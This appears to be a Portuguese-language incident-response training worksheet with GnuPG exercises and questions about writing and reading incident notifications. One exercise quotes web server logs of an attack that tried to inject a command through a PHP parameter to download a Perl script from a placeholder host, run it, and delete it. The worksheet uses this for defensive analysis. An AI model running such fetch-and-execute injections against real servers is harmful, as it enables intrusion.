Baixe o app para aproveitar ainda mais
Prévia do material em texto
16/05/2022 16:04 Sessão 5: Aspectos Operacionais da Resposta de Incidentes file:///D:/projetos/esr/esr-seg4/html/_cadernos/seg4_caderno_s5.html 1/3 Sessão 5: Aspectos Operacionais da Resposta de Incidentes 1. Atividade – Utilizando PGP A utilização de criptografia, conforme comentado, é altamente recomendável e muitas vezes mandatória para a troca de informações de incidentes de segurança. Nesta atividade vamos usar o software GNUPG para realizar tarefas básicas: Criar uma chave PGP para ser utilizada no seu CSIRT. 1. O processo de criação de chaves é totalmente interativo, para iniciá-lo, utilize o comando: # gpg --gen-key 2. As chaves são criadas no diretório “~/.gnupg/”. Para listar as chaves, utilize o comando a seguir: # gpg --list-keys Criar um arquivo com um conteúdo qualquer: # echo 'Ola Mundo' > arquivo.txt Veja que foi criado um arquivo contendo a assinatura arquivo.txt.asc 3. Assinar um arquivo: # gpg -s --clearsign arquivo.txt 4. Criptografando um arquivo: # gpg --encrypt arquivo.txt Na pergunta Enter the user ID. informe o email utilizado durante o processo de geração das chaves. Neste caso o arquivo será criptografado utilizando a sua chave pública portanto apenas sua chave privada poderá visualizar o conteúdo 5. Exportar a sua chave pública para um arquivo (obs.: substitua csirt@csirt.com pelo email utilizando durante o processo de geração das chaves): # gpg --export -a csirt@csirt.com >chave-publica_CSIRT_A.txt 6. Importar uma chave pública de outro aluno (você deve combinar com outro aluno a forma como rá receber a chave pública): # gpg --import chave-publica_CSIRT_X.txt # gpg --list-keys 7. Importar a chave pública do CERT.br: # wget http://www.cert.br/pgp/CERTbr.asc ; gpg -import CERTbr.asc # gpg --import CERTbr.asc # gpg --list-keys 16/05/2022 16:04 Sessão 5: Aspectos Operacionais da Resposta de Incidentes file:///D:/projetos/esr/esr-seg4/html/_cadernos/seg4_caderno_s5.html 2/3 8. Cifrar um arquivo com a chave pública importada (você deve substituir o valor ID_CSIRT_X pelo email do CERTBr constante no certificado. Esta informação pode ser visualizada com o comando gpg --list-keys e, provavelmente, será cert@cert.br ): # gpg -r ID_CSIRT_X --encrypt arquivo.txt 2. Atividade – Noti�cação de incidentes Quais seriam as vantagens e desvantagens de notificar um incidente de segurança utilizando as duas linhas de logs a seguir: Log A: 2013-09-30 22:07:28 PST 20.20.20.20/2231-> xxx.xxx.xxx.xxx/22 Log B: 2013-09-30 22:07:28 PST 20.20.20.20/2231-> 30.30.30.30/22 Comentários: 3. Atividade – Identi�car informações relevantes em uma noti�cação recebida Avalie a notificação de incidente a seguir e responda os possíveis desmembramentos do incidente. Para isso, considere a sua abrangência operacional: Você representará a “universidade.exp.net.br”; Seu bloco de endereçamento é: 192.168.0.0/24 From: csirt@universidade.exp.net.br To: csirt@esr.rnp.br Subject: Ataque ao servidor web Senhores, Detectamos através de nossos sistemas de segurança que uma máquina de sua responsabilidade está buscando vulnerabilidades no nosso servidor web. Solicitamos que investigue o incidente a seguir e tome as medidas cabíveis. 10.10.10.10 - - [14/Nov/2014:08:50:43 -0200] “GET +/forum2013/slides//images/docs/morocanz.php? cmd=cd%20/tmp%20;wget%20http://website.com.xxx/p.log%20;%20 perl%20p.log%20;%20rm%20-rf%20p.log HTTP/1.1” 404 7488 “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.1” 10.10.10.10 - - [14/Nov/2014:12:57:19 -0200] “GET /docs/papers/hnbr-first2003.pdf//images/docs/morocanz.php?rf HTTP/1.1” 404 7488 “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.1” 10.10.10.10 - - [14/Nov/2014:12:57:20 -0200] “GET +/docs/papers//images/docs/morocanz.php? cmd=cd%20/tmp%20;wget%20http://website.com.xxx/p.log%20;%20 perl%20p.log%20;%20rm%20-rf%20p.log HTTP/1.1” 404 7488 “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.1” Atenciosamente, CSIRT Faça um resumo do incidente a seguir descrevendo o ataque. mailto:csirt@universidade.exp.net.br mailto:csirt@esr.rnp.br 16/05/2022 16:04 Sessão 5: Aspectos Operacionais da Resposta de Incidentes file:///D:/projetos/esr/esr-seg4/html/_cadernos/seg4_caderno_s5.html 3/3 O incidente foi bem-sucedido? O atacante teve sucesso na sua investida? Por quê? Esse incidente vai gerar uma notificação externa? ENTREGA DA TAREFA Para que seja considerada entregue você deve anexar a esta atividade no AVA um arquivo texto contendo a respostas de todas as perguntas realizadas ao longo desta tarefa. Última atualização 2022-05-16 16:02:03 -0300
Compartilhar